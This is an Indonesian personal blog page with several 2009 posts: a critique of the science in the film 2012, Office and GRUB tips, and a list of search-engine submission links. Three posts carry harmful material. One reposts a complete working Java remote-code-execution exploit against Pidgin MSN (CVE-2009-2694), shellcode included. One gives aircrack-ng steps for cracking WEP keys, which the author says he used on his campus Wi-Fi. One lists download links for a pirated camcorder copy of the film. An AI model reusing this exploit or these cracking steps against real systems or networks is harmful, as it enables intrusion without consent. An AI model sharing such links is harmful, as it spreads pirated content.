Minggu, 22 November 2009

2012 dan 11 Kritik Ilmiah

Film 2012 sendiri menjadi menarik buat saya terutama setelah saya mendengar fatwa haram dari MUI (Amidhan) karena film ini menceritakan kiamat, and bla bla (metro TV senin 16 Nov malam). Sehingga besok sorenya langsung saya tonton. Kesan saya setelah menonton, film ini walau mengangkat issue ilmiah, namun justru banyak hal yang terasa kurang ilmiah.

Berikut ini beberapa kupasan ilmiah yang menjelaskan kekurang ilmiahan film tersebut:

- Pertama; kehancuran dunia itu dipicu oleh ketidakstabilan inti akibat gaya tarik matahari dan inti galaksi, yang seakan memiliki periode ulang tiap 70 jt tahun (jurasic). Setahu saya, 70 jt tahun yll, memang terjadi laut naik maksimum (maximum sea level rise) namun tidak disertai dengan pergeseran lempeng secara cepat sebagaimana ditampilkan dalam film 2012.


- Kedua: Terbentuknya patahan besar di amerika bagian barat ( 600 an km relatif utara selatan) dalam waktu 2 jam, berarti rekahan itu membuka dengan kecepatan rata2 300 km/ jam. Namun dalam adegan mobil (yang disupiri oleh aktor utama) berlari berkejaran dengan rekahan nampaknya si mobil berhasil melewati/ menyamai kecepatan rekahan. Agak mengherankan di tengah2 lalulintas yang padat, sebuah mobil dapat melaju lebih dari 300 km/ jam.


- Ketiga: Dalam adegan pesawat yang berkejaran dengan abu gunung api (pyroclastic ash) tampak pesawat sempat masuk ke dalam badai abu namun akhirnya keluar dengan selamat. Apabila kita ingat kejadian pesawat garuda yang mesinnya mati akibat kemasukan abu vulkanik gunung galunggung di tahun 1983 an (padahal tidak disaat meletus), dan berbagai pesawat jatuh akibat kemasukan abu vulkanik lainnya, nampaknya adegan ketika sang aktor utama dengan pesawat berbaling-baling (propeler) dapat keluar dari abu sangatlah mengherankan.


- Keempat: perlu pula diketahui, semburan pyroclastic ash dari gunung yang baru meletus itu suhunya sekitar 600 derajat celcius, harusnya orang2 yg didalam pesawat akan termasak hidup2 ketika pesawatnya masuk ke dalam abu tersebut.


- Kelima: Ketika pesawat Antonov yang dinaiki sang aktor melewati Hawai yang sudah porak poranda karena gunungnya meletus, pesawat tersebut dapat terbang dengan normal-normal saja.


- Keenam; ketiga kutub utara bumi berubah menjadi kutub barat dan timur, lalu bagaimana bumi bisa berotasi? Sedangkan kehidupan pada waktu itu masih lancar2 saja kecuali pada daerah yang sudah mengalami tsunami dan gempa.


- Ketujuh: inti bumi itu sebenarnya padat, namun dalam film tersebut ditampilkan bahwa dibawah permukaan seperti ruang kosong dimana bangunan, gedung2 bertingkat dapat masuk/ terjun ke bawah.


-Kedelapan: tidak semua bagian bawah bumi itu ada magma, karena magma hanya berada pada jalur subduksi (volcanic arc) saja. Namun tampaknya di dalam film di setiap rekahan yang terbentuk nampak ada magma yang mengalir (sangat tidak logis).


-Kesembilan : Ketika pesawat antonov yang dinaiki sang aktor kehabisan bahan bakar padahal tujuannya China, seharusnya mereka mendarat di laut namun ternyata mereka mendarat di daratan China. Dalam film itu dikisahkan bahwa dataran China bergeser menuju Hawai (lebih dari 8000 km) dalam waktu kurang dari 10 jam. Artinya dataran itu bergerak dengan kecepatan lebih dari 800 km/ jam (mirip pesawat terbang). Sedangkan pegunungan himalaya dan suku Tibet di atasnya digambarkan baik2 saja. Bahkan helicopter (yang kecepatannya hanya 300 km/ jam) pun dapat berlalu-lalang dengan enaknya di pegunungan himalaya. Apabila datarannya bergerak dengan kecepatan 800 km/jam, bagaimana helicopter di atasnya bisa bergerak dengan mudah take off dan landing dengan santainya??


> -Kesepuluh : dalam zaman akhir Kapur, seluruh es pernah mencair, kandungan uap air menurun, sehingga muka air laut naik (tertinggi). Ternyata jumlah volume air bila seluruh air dijatuhkan ke laut hanyalah akan mengangkat muka laut hingga 200 an meter dari sekarang. Nah dalam film itu, air laut naik hingga mencapai 29.000 feet…… atau hampir 10 km…10.000 m??? Bagimana bisa?? dari mana air itu berasal???


> -Kesebelas: dalam film itu digambarkan bahwa Pegunungan Himalaya adalah daerah yang hancur belakangan, karena merupakan daerah tinggian (terakhir tenggelam). Padahal sesungguhnya daerah Himalaya adalah daerah collision (tumbukan) dari 2 lempeng yang bersifat tektonik aktif. Lalu bagaimana Himalaya justru hancur belakangan??(Didit Ndut)
Read More »

How to open docx in office 2003

Habis instal windows, jangan lupa instal microsoft office. bagi gue, 2 hal tersebut tidak dapat dipisahkan. gue masih belum bisa berpaling menggunakan program pengolah data lain. Namun bukan berarti gue ga mau berpaling menggunakan yang lain. Gue cuma masih berusaha mengurangi jumlah program bajakan dalam PC tua gue ini. :-)

Langsung aja di install Microsoft Office 2003 yang emang sudah selalu disiapkan di sebelah PC gue. langsung install complete, karena terkadang gue suka males kalo nanti ada paket2 yang butuh di instal.

Selesai instal, mulailah mencoba-coba aplikasinya. selalu gue mulai dengan microsoft word 2003. program pengolah kata yang telah gue kenal sejak gue berkenalan dengan windows. coba buka beberapa dokumen, tampaknya tidak ada masalah. semua file dokumen gue bisa dibuka dengan baik.

Masalah baru timbul saat ade gue nitip Flashdisknya untuk di scan virus. terlihat di Flashdisknya sebuah extention aneh dengan logo word. file tersebut berextenstionnya .docx

Mulailah mencari informasi, file apakah gerangan. kunjungi situs microsoft, menerangkan bahwa extention tersebut adalah Docx merupakan standard file MS Office 2007 milik Microsoft. Lebih spesific standard itu bernama OOXML alias Open Office. XML. Waduh, apalagi itu. makin ga ngerti gue. hehe,,,,

Standard .docx ini banyak bikin repot mereka yang tidak tahu. Tidak sedikit yang panik, karena menyangka itu virus. Solusinya bagaimana? apakah harus instal ulang Microsoft officenya ke versi 2007? ternyata tidak. solisinya mudah, setelah di cari menggunakan jasa paman Google (sungguh, gue ga bisa bayangin Internet tanpa kehadiran Google). Gue mendapat banyak software yang menawarkan jasa converter dari docx ke doc, sehingga MS Word kita yang sekarang bisa membuka file .docx tersebut.
Diantaranya http://zamzar.com/. Kunjungi webnya.web sitenya straigth to the point, dan mudah
penggunaannya.Intinya mereka akan mengconvert secara online file .docx milik Anda ke
format standard .doc dan mengirimkan via email.

Tapi bagaimana kalo kita jarang-jarang terkoneksi internet dan sedang butuh untuk membuka file tersebut. selidik punya selidik, ternyata Microsoftpun merelease patch agar product-product lawasnya dapat membuka file extention dalam microsoft 2007. Berikut kutipan langsung dari site resminya di sini.

To open Microsoft Office Word 2007 .docx or .docm files with Microsoft Office Word 2003, Word 2002, or Word 2000, you need to install the Microsoft Office Compatibility Pack for 2007 Office Word, Excel and PowerPoint File Formats and any necessary Office updates. By using the Compatibility Pack for the 2007 Office system, you can open, edit some items, and save Office Word 2007 documents in previous versions of Word. You can download the Compatibility Pack for the 2007 Office system from Microsoft Office Online.

With the Compatibility Pack, you can use some previous versions of Word to open Office Word 2007 documents that were saved in .docx and .docm formats. You cannot open Office Word 2007 template files that were saved in .dotx or .dotm format.


langsung aja pada intinya. Microsoft menyediakan fileconverter untuk edisi office lawas, agar dapat membaca extention keluaran dari office 2007. untuk dapat mencoba fileconverter tersebut, silahkan download patchnya di sini.

Langkah berikutnya sama seperti install file biasa. dan sekarang, Microsoft office gue adalah microsoft office 2003 rasa 2007. :-)

Thanks to :

- Google
- Microsoft Official site




Read More »

Sabtu, 21 November 2009

Reinstal Grub yang hilang setelah install windows

Akhirnya, malam ini bisa sedikit tenang. setelah semua kesibukan seharian. dari pergi kondangan sampe kuliah dan nungguin dosen yang ngaret ga tau mpe jam berapa. dah gitu, hari ini koprs berseragam coklat sedang mencari tambahan rejeki, ada razia kendaraan sampe 3 kali sepanjang perjalanan dari bekasi ke rawamangun. Untung surat-surat dan lain-lainnya lengkap. jadi tidak ada kendala berarti dalam perjalanan pulang... Ups, tapi bukan itu maksud tulisan malam ini. :-) as you know, gue berusaha buat blog gue berisikan seputar tulisan-tulisan praktikum gue.

Rencana malam ini adalah instal ulang windows dan optimasi. karena sepertinya windows yang terpasang sekarang sudah sangat terasa amat lambat. hingga untuk buka beberapa program bersamaan gue bisa selingi dengan bikin kopi. :-( memang, sudah lumayan lama windows ini tidak terurus. setelah beberapa bulan ini lagi sibuk beradaptasi dengan sistem Open source.

Oke, instal ulang selesai. Namun ada sedikit masalah. ternyata saat booting ulang, partisi Ubuntu tidak terbaca. sempet bingung, apakah harus instal ulang atau ada hal yang bisa dilakukan. akhirnya dengan sedikit bantuan dari paman Google, didapat jawabannya. ternyata, Grub Ubuntu tertiban ama microsoft.

Berikut cara untuk mengembalikan konfigurasi Grub yang tertiban oleh Microsoft.

1. sediakan live cd ubuntu
2. masuk dulu ke bios trus setting first boot device nya cd room
3. booting lah memakai live cd ubuntu
4. pilih option start using live cd ubuntu without installing
5. begitu dah masuk bukalah terminal = application -> accesories -> terminal
6. ketik sudo grub
7. ketik find /boot/grub/stage1; akan keluar hasilnya dari (sd?,?) misalkan (sd0,7)
8. ketik root (sd?,?); isikan dari hasil nomor 7 diatas
9. ketik setup (sd0)
10. quit
11. restart ubuntu,
12. ubah kembali bootnya menjadi hardisk. dan kini PC gue kembali dual boot kembali.


Rencana berikutnya, optimasi windows gue agar bisa makin ngacir. dengan sedikit trik dari sini.

thanks to :
- google.com
- p19n0s3

Read More »

Kamis, 19 November 2009

How to decrypt WEP and WAP key

Lagi iseng-iseng pengen belajar bagaimana cara membuka password wifi di kampus. ketemu video tutorial ini. Dah di coba dikampus, mangstap. cuma butuh waktu 10 menit untuk bongkar password wifi...

Sok atuh monggo di cek...

tools :
- Aircrack-ng
- Ubuntu Linux
- Wireless card merk Ralink atau Atheros yang bisa digunakan sebagai injector packet
- Access Point yang mau dipake buat percobaan. :-)


A. WEP Key

video

Berikut Step-stepnya :

1. ubah mode interface wireless kita menjadi mode monitor (disini menggunakan rausb0)
root@Tom-PC:~#airmon-ng start rausb0


2. cek status mode interface tersebut
root@Tom-PC:~#iwconfig

3. Cek Access Point yang tersedia hingga di dapat target.
root@Tom-PC:~#airodump-ng rausb0


4. Setelah target ditemukan, mulai capture IVS.
root@Tom-PC:~#airodump-ng --ivs -c --write namafile rausb0


5. sekarang kita mulai lakukan Aireplay Attacks. Langkah pertama yang harus dilakukan adalah
root@Tom-PC:~#aireplay-ng -3 -b rausb0
root@Tom-PC:~#aireplay-ng -1 0 -a rausb0
root@Tom-PC:~#aireplay-ng -0 0 -a rausb0




note : command lebih lanjut tentang aireplay bisa di lihat menggunakan aireplay-ng --help

6. setelah data cukup, gunakan aircrack untuk mendecrypt ivs.
root@Tom-PC:~#aircrack-ng namafile*.ivs



B. WPA Key

video

Read More »

Selasa, 17 November 2009

Pidgin MSN <= 2.5.8 Remote Code Execution

/*
* Pidgin MSN <= 2.5.8 Remote Code Execution
*
* Pierre Nogues - pierz@hotmail.it
* http://www.indahax.com/
*
*
* Description:
* Pidgin is a multi-protocol Instant Messenger.
*
* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].
* The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets
* which could lead to memory corruption.
*
* Affected versions :
* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.
*
* Plateforms :
* Windows, Linux, Mac
*
* Fix :
* Fixed in Pidgin 2.5.9
* Update to the latest version : http://www.pidgin.im/download/
*
* References :
* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write
* [3] http://www.pidgin.im/news/security/?id=34
*


* Usage :
* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
* javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java
* java -cp "%classpath%;.\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
*
*/

import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;

public class PidginExploit {

private MsnMessenger messenger;
private String login;
private String password;
private String target;

private int session_id = NumberUtils.getIntRandom();

private byte shellcode[] = new byte[] {

/*
* if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !
* sub esp,500
*/
(byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,


/*
* windows/exec - 121 bytes
* http://www.metasploit.com
* EXITFUNC=process, CMD=calc.exe
*/
(byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
(byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
(byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
(byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
(byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
(byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
(byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
(byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
(byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
(byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
(byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
(byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
(byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
(byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
(byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
(byte) 0x00
};

// reteip = pointer to the return address in the stack
// The shellcode will be wrote just before reteip
// and reteip will automaticly point to the shellcode. It's magic !
private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8

private int neweip;
private byte[] payload = new byte[shellcode.length + 4];
private int totallength = reteip + 4;

public static void main(String[] args) throws Exception {

if(args.length != 3){
System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
}else{
PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);
exploit.start();
}

}

public PidginExploit(String login, String password, String target){
this.login = login;
this.password = password;
this.target = target;

neweip = reteip - shellcode.length ;

for(int i=0;i payload[i] = shellcode[i];

payload[shellcode.length] = (byte)(neweip & 0x000000FF);
payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);
payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);
payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
}

public void start() {
messenger = MsnMessengerFactory.createMsnMessenger(login,password);
messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);

messenger.setLogIncoming(false);
messenger.setLogOutgoing(false);

initMessenger(messenger);
messenger.login();
}

protected void initMessenger(MsnMessenger messenger) {

messenger.addContactListListener(new MsnContactListAdapter() {

public void contactListInitCompleted(MsnMessenger messenger) {

final Object id = new Object();

messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {

public void switchboardStarted(MsnSwitchboard switchboard) {

if (id != switchboard.getAttachment())
return;

switchboard.inviteContact(Email.parseStr(target));
}

public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
if (id != switchboard.getAttachment())
return;

MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
msg.setIdentifier(NumberUtils.getIntRandom());
msg.setSessionId(session_id);
msg.setOffset(0);
msg.setTotalLength(totallength);
msg.setCurrentLength(totallength);

// This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null
// We'll use this buffer to rewrite memory in the stack
msg.setFlag(0x1000020);

msg.setP2PDest(target);

switchboard.sendMessage(msg);

System.out.println("First packet sent, waiting for the ACK");

}

public void switchboardClosed(MsnSwitchboard switchboard) {
System.out.println("switchboardClosed");
switchboard.getMessenger().removeSwitchboardListener(this);
}

public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
System.out.println("contactLeaveSwitchboard");
}
});
messenger.newSwitchboard(id);
}
});

messenger.addMessageListener(new MsnMessageAdapter(){

public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {

//We receive the ACK of our first packet with the ID of the new bogus packet
message.getIdentifier();

MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
payload.length, payload, target);

switchboard.sendMessage(msg);
System.out.println("ACK received && Payload sent !");
System.out.println("Exploit OK ! CTRL+C to quit");

}
});



messenger.addMessengerListener(new MsnMessengerAdapter() {

public void loginCompleted(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " login");
}

public void logout(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " logout");
}

public void exceptionCaught(MsnMessenger messenger,
Throwable throwable) {
System.out.println("caught exception: " + throwable);
}
});

}
}

// milw0rm.com [2009-09-09]

Sumber : di sini
Read More »

Senin, 16 November 2009

Download 2012 Full Movie CAM Quality


huft nemu juga akhirnya,..?

yang pengin nonton tapi males antri tiket + gag punya uang,kenapa gag donlot sendiri aja,..

kan bisa berduaan ma pacar dikamar,..wkwkkwkww,..

tapi masih dalam bahasa linggis nie,..?

silakan aja di donlot,..



Hotfile


http://hotfile.com/dl/16871763/f51f2e0/2012_ENG.part1.rar.html

http://hotfile.com/dl/16871764/9d117b3/2012_ENG.part2.rar.html

http://hotfile.com/dl/16871765/b854f63/2012_ENG.part3.rar.html

http://hotfile.com/dl/16871766/4fae46b/2012_ENG.part4.rar.html

http://hotfile.com/dl/16871821/c30edbc/2012_ENG.part5.rar.html

http://hotfile.com/dl/16871823/fd6f1e9/2012_ENG.part6.rar.html

http://hotfile.com/dl/16871826/be57750/2012_ENG.part7.rar.html

Uploading

http://uploading.com/files/d4d3fd4a/2012_ENG.part1.rar

http://uploading.com/files/2455c648/2012_ENG.part2.rar

http://uploading.com/files/mm1e5571/2012_ENG.part3.rar

http://uploading.com/files/e99m4fbm/2012_ENG.part4.rar

http://uploading.com/files/279af8a7/2012_ENG.part5.rar

http://uploading.com/files/bd751264/2012_ENG.part6.rar

http://uploading.com/files/ecffd39f/2012_ENG.part7.rar



update link

http://rapidshare.com/files/304768057/2012_warezlobby.org.part1.rar

http://rapidshare.com/files/304768221/2012_warezlobby.org.part2.rar

http://rapidshare.com/files/304768319/2012_warezlobby.org.part3.rar

http://rapidshare.com/files/304768488/2012_warezlobby.org.part4.rar

http://rapidshare.com/files/3047684...31/2012_warezlobby.org.part5.rar

http://rapidshare.com/files/304767813/2012_warezlobby.org.part6.rar

http://rapidshare.com/files/304767157/2012_warezlobby.org.part7.rar

http://rapidshare.com/files/304767977/2012_warezlobby.org.part8.rar



Update link lagi

http://hotfile.com/dl/17496342/177ff7b/sobisvn_2012CAM.part1.rar.html
http://hotfile.com/dl/17496348/05b7c1d/sobisvn_2012CAM.part2.rar.html
http://hotfile.com/dl/17496346/283ab80/sobisvn_2012CAM.part3.rar.html
http://hotfile.com/dl/17496343/7ba55ca/sobisvn_2012CAM.part4.rar.html
http://hotfile.com/dl/17496344/d4...08c0a/sobisvn_2012CAM.part5.rar.html
http://hotfile.com/dl/17496347/b38a47b/sobisvn_2012CAM.part6.rar.html
http://hotfile.com/dl/17496345/8541c7f/sobisvn_2012CAM.part7.rar.html




nambah lagi




http://rapidshare.com/files/306794911/2012.2009.D.CAMRip.ELEKTRI4KA.part01.rar
http://rapidshare.com/files/306795225/2012.2009.D.CAMRip.ELEKTRI4KA.part02.rar
http://rapidshare.com/files/306795555/2012.2009.D.CAMRip.ELEKTRI4KA.part03.rar
http://rapidshare.com/files/306794789/2012.2009.D.CAMRip.ELEKTRI4KA.part04.rar
http://rapidshare.com/files/306795269/2012.2009.D.CAMRip.ELEKTRI4KA.part05.rar
http://rapidshare.com/files/306794670/2012.2009.D.CAMRip.ELEKTRI4KA.part06.rar
http://rapidshare.com/files/306796556/2012.2009.D.CAMRip.ELEKTRI4KA.part07.rar
http://rapidshare.com/files/306796754/2012.2009.D.CAMRip.ELEKTRI4KA.part08.rar
http://rapidshare.com/files/306795130/2012.2009.D.CAMRip.ELEKTRI4KA.part09.rar
http://rapidshare.com/files/306794308/2012.2009.D.CAMRip.ELEKTRI4KA.part10.rar

tambahan dari IDWS

http://download.en.hellshare.com/2012-ta8626-www-movieinfo-blog-com.avi/702902
or
http://www.storage.to/get/yyPk2v3Z/2012.TA8626_www.movieinfo.blog.com_.avi
or
http://www.BigAndFree.com/492058
or
http://filebase.to/files/1019429/2012.TA8626_www.movieinfo.blog.com_.avi
or
http://www.megaupload.com/?d=JI8N1DS3
or
http://www.megavideo.com/?d=JI8N1DS3
or
http://rapidshare.com/files/306844566/2012.TA8626_www.movieinfo.blog.com_.avi.html
or
http://www.mystream.to/file-7194917-8ccba69f-2012.TA8626_www.movieinfo.blog.com_.avi
or
http://letitbit.net/download/0121.07e27533bc4770210e7d0df50/2012.TA8626_www.movieinfo.blog.com_.avi.html
or
http://d01.megashares.com/dl/6b116bc/2012.TA8626_www.movieinfo.blog.com_.avi
or
http://bitroad.net/download/27a72ecedd06d7fb464777ebfa6a0d4f9/2012.TA8626-www.movieinfo.blog.com-.avi.html
or
http://vip-file.com/download/8479.85f9e2ab5ddc931ca1ccd432cc/2012.TA8626_www.movieinfo.blog.com_.avi.html
or
http://sms4file.com/downloadvip/8479.85f9e2ab5ddc931ca1ccd432cc/2012.TA8626_www.movieinfo.blog.com_.avi.html
or
http://quickupload.net/1h1a2zg50639/2012.TA8626_www.movieinfo.blog.com_-quickupload.net.avi.html
or
http://www.2shared.com/file/9150461/9b9819ed/2012TA8626_wwwmovieinfoblogcom_.html
or
http://depositfiles.com/files/e15swczwc
or
http://www.zshare.net/video/68450747bff3a9b6/
or
http://uploadbox.com/files/bef0f1393c
or
http://netload.in/datei0rbdtLAcsR/2012.TA8626_www.movieinfo.blog.com_.avi.003.htm
http://netload.in/datei5RiT0UuC4Q/2012.TA8626_www.movieinfo.blog.com_.avi.002.htm
http://netload.in/dateiDchWjKffvP/2012.TA8626_www.movieinfo.blog.com_.avi.001.htm
http://netload.in/datei3Awo1RY8cF/2012.TA8626_www.movieinfo.blog.com_.avi.005.htm
http://netload.in/dateiSghG9fzyEY/2012.TA8626_www.movieinfo.blog.com_.avi.004.htm
or
http://hotfile.com/dl/17529656/eaae63d/2012.TA8626_www.movieinfo.blog.com_.avi.003.html
http://hotfile.com/dl/17529787/01b7cfd/2012.TA8626_www.movieinfo.blog.com_.avi.002.html
http://hotfile.com/dl/17530005/f7e5958/2012.TA8626_www.movieinfo.blog.com_.avi.001.html
http://hotfile.com/dl/17530108/27b15ef/2012.TA8626_www.movieinfo.blog.com_.avi.005.html
http://hotfile.com/dl/17530328/2461c94/2012.TA8626_www.movieinfo.blog.com_.avi.004.html
or
http://www.load.to//2012.TA8626_www.movieinfo.blog.com_.avi.003
http://www.load.to//2012.TA8626_www.movieinfo.blog.com_.avi.002
http://www.load.to//2012.TA8626_www.movieinfo.blog.com_.avi.001
http://www.load.to//2012.TA8626_www.movieinfo.blog.com_.avi.005
http://www.load.to//2012.TA8626_www.movieinfo.blog.com_.avi.004
or
http://www.BigAndFree.com/494104/2012.TA8626_www.movieinfo.blog.com_.avi.003.html
http://www.BigAndFree.com/494106/2012.TA8626_www.movieinfo.blog.com_.avi.002.html
http://www.BigAndFree.com/494107/2012.TA8626_www.movieinfo.blog.com_.avi.001.html
http://www.BigAndFree.com/494108/2012.TA8626_www.movieinfo.blog.com_.avi.005.html
http://www.BigAndFree.com/494109/2012.TA8626_www.movieinfo.blog.com_.avi.004.html
or
http://rapidshare.com/files/306847449/2012.TA8626_www.movieinfo.blog.com_.avi.005
http://rapidshare.com/files/306848299/2012.TA8626_www.movieinfo.blog.com_.avi.002
http://rapidshare.com/files/306848750/2012.TA8626_www.movieinfo.blog.com_.avi.004
http://rapidshare.com/files/306850315/2012.TA8626_www.movieinfo.blog.com_.avi.003
http://rapidshare.com/files/306850406/2012.TA8626_www.movieinfo.blog.com_.avi.001
or
http://www.mediafire.com/?0mkmwhw0q2z
http://www.mediafire.com/?mqh134tn0qy
http://www.mediafire.com/?wlqdmllxzml
http://www.mediafire.com/?5ol1tztffja
http://www.mediafire.com/?bzmwmzjijjm


silakan pilih sesuka kalian,....hehhehehe,..

Update : Saat ini, 22 November 2009. gue mendapat info bahwa semua link ini sudah ticak valid. gue ga tau kenapa tiba-tiba langsung dihapus. apakah ada hubungannya dengan berbagai protes keras dari berbagai penganut agama di seluruh dunia. :-) who knows..

Read More »

Minggu, 15 November 2009

Link Untuk Daftarkan Blog ke Search Engine

http://FreeWebSubmission.com
http://buildtraffic.com/free_search_...ubmission.html
http://www.addme.com/submission/free...sion-start.php
http://search.yahoo.com/info/submit.html
http://www.google.com/addurl/?continue=/addurl
http://search.msn.com/docs/submit.aspx
http://www.dmoz.org/add.html
http://www.exalead.com/search/C=0?de...itYourSitePage
http://www.scrubtheweb.com/addurl.html
http://www.cuil.com/info/contact_us/...?to=crawl%20me
http://www.whatuseek.com/addurl-secondary.shtml
http://www.exactseek.com/add.html
http://www.businessseek.biz/page.php...mission-policy
http://www.entireweb.com/free_submission/
http://www.searchme.com/support/submit.php
http://www.illumirate.com/add_your_site_exp.cfm
http://www.01webdirectory.com/submit.htm
http://addurl.amfibi.com/
http://searchsight.com/submit.htm
http://www.webbieworld.com/signup.asp
http://www.wlinker.com/add_submit_url
http://www.netinsert.com/en/insert.html
http://search.sonicrun.com/add
http://www.thalesdirectory.com/submit.php
http://www.linkcentre.com/addurl.html
http://re.search.wikia.com/
http://www.worldsiteindex.com/
http://www.mavicanet.com/



Untuk Search Engine Google di berbagai negara

http://www.google.co.kr/addurl
http://www.google.com/addurl
http://www.google.hu/addurl
http://www.google.de/addurl
http://www.google.jp/addurl
http://www.google.co.uk/addurl
http://www.google.com.au/addurl
http://www.google.ad/addurl
http://www.google.ae/addurl
http://www.google.com.af/addurl
http://www.google.com.ag/addurl
http://www.google.com.ai/addurl
http://www.google.am/addurl
http://www.google.it.ao/addurl
http://www.google.com.ar/addurl
http://www.google.as/addurl
http://www.google.at/addurl
http://www.google.az/addurl
http://www.google.com.bd/addurl
http://www.google.be/addurl
http://www.google.bg/addurl
http://www.google.com.bh
http://www.google.bi/addurl
http://www.google.com.bn/addurl
http://www.google.com.bo/addurl
http://www.google.com.br/addurl
http://www.google.bs/addurl
http://www.google.co.bw/addurl
http://www.google.com.by/addurl
http://www.google.com.bz/addurl
http://www.google.ca/addurl
http://www.google.cd/addurl
http://www.google.cg/addurl
http://www.google.ch/addurl
http://www.google.ci/addurl
http://www.google.co.ck/addurl
http://www.google.cl/addurl
http://www.google.cn/addurl
http://www.google.com.co/addurl
http://www.google.co.cr/addurl
http://www.google.com.cu/addurl
http://www.google.cz/addurl
http://www.google.de/addurl
http://www.google.dj/addurl
http://www.google.dk/addurl
http://www.google.dm/addurl
http://www.google.com.do/addurl
http://www.google.com.ec/addurl
http://www.google.ee/addurl
http://www.google.com.eg/addurl
http://www.google.es/addurl
http://www.google.com.et/addurl
http://www.google.fi/addurl
http://www.google.com.fj/addurl
http://www.google.fm/addurl
http://www.google.fr/addurl
http://www.google.ge/addurl
http://www.google.gg/addurl
http://www.google.com.gh/addurl
http://www.google.com.gi/addurl
http://www.google.gl/addurl
http://www.google.gm/addurl
http://www.google.gp/addurl
http://www.google.gr/addurl
http://www.google.com.gt/addurl
http://www.google.gy/addurl
http://www.google.com.hk/addurl
http://www.google.hn/addurl
http://www.google.hr/addurl
http://www.google.ht/addurl
http://www.google.hu/addurl
http://www.google.co.id/addurl
http://www.google.ie/addurl
http://www.google.co.il/addurl
http://www.google.im/addurl
http://www.google.co.in/addurl
http://www.google.is/addurl
http://www.google.it/addurl
http://www.google.je/addurl
http://www.google.com.jm/addurl
http://www.google.jo/addurl
http://www.google.co.jp/addurl
http://www.google.co.ke/addurl
http://www.google.com.kh/addurl
http://www.google.ki/addurl
http://www.google.kg/addurl
http://www.google.co.kr/addurl
http://www.google.kz/addurl
http://www.google.la/addurl
http://www.google.li/addurl
http://www.google.lk/addurl
http://www.google.co.ls/addurl
http://www.google.lt/addurl
http://www.google.lu/addurl
http://www.google.lv/addurl
http://www.google.com.ly/addurl
http://www.google.co.ma/addurl
http://www.google.md/addurl
http://www.google.mn/addurl
http://www.google.ms/addurl
http://www.google.com.mt/addurl
http://www.google.mu/addurl
http://www.google.mv/addurl
http://www.google.mw/addurl
http://www.google.com.mx/addurl
http://www.google.com.my/addurl
http://www.google.com.na/addurl
http://www.google.com.nf/addurl
http://www.google.com.ng/addurl
http://www.google.com.ni/addurl
http://www.google.nl/addurl
http://www.google.no/addurl
http://www.google.com.np/addurl
http://www.google.nr/addurl
http://www.google.nu/addurl
